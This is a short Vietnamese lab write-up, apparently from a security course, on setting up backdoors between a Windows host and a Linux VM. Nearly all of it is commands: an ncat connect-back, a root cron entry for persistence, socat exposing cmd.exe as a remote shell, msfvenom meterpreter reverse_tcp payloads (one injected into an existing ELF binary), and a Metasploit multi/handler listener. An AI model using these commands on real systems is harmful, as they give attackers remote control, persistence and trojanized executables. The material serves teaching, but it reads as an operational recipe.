Phân tích và Triển khai Backdoor trong Môi trường Hệ thống

Phương pháp và Thực hiện

Trong bài thực hành này, chúng tôi tập trung vào các kỹ thuật triển khai backdoor và kiểm soát hệ thống thông qua các công cụ mạng chuyên dụng.

Trên máy chủ Windows, thực hiện lệnh ipconfig để xác định địa chỉ IP (ví dụ: 172.16.178.44). Sau đó, thiết lập lắng nghe trên cổng 2304 bằng lệnh:

ncat -lvp 2304

Trên máy ảo Linux, thiết lập kết nối ngược về máy chủ Windows:

ncat 172.16.178.44 2304

Sau khi kết nối thành công, có thể thực thi lệnh ls để kiểm tra hệ thống mục tiêu.

Để thực hiện tác vụ định kỳ, cần chuyển sang tài khoản root trên máy ảo Linux. Tạo file cron với nội dung sau:

echo "*/1 * * * * echo 'LAB02_TEMP' > /tmp/lab_data.txt" > /var/spool/cron/crontabs/root

Lệnh này sẽ ghi chuỗi "LAB02_TEMP" vào file /tmp/lab_data.txt mỗi phút. Kiểm tra bằng crontab -l và xác minh nội dung file sau 60 giây.

Tải Socat và khởi động dịch vụ lắng nghe trên cổng 9999:

socat TCP4-LISTEN:9999 EXEC:cmd.exe,pty,stderr

Từ máy ảo Linux, kết nối đến máy chủ Windows:

socat STDIO TCP4:172.16.178.44:9999

Thiết lập payload cho hệ thống Windows:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.178.44 LPORT=2304 -o payload.bin

Sau khi truyền file payload.bin về máy Windows và thực thi, thiết lập khung Metasploit để lắng nghe:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 172.16.178.44
set LPORT 2304
exploit

Sau khi kết nối thành công, thực hiện các lệnh sau:

Chèn shellcode vào file thực thi Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.178.44 LPORT=2304 -x /bin/pwn1 -f elf > pwn_shell

Cấp quyền thực thi và khởi chạy:

chmod +x pwn_shell
./pwn_shell

Trên máy chủ Metasploit, thiết lập lắng nghe tương ứng để nhận kết nối.

Đăng vào ngày 14 tháng 6 lúc 07:40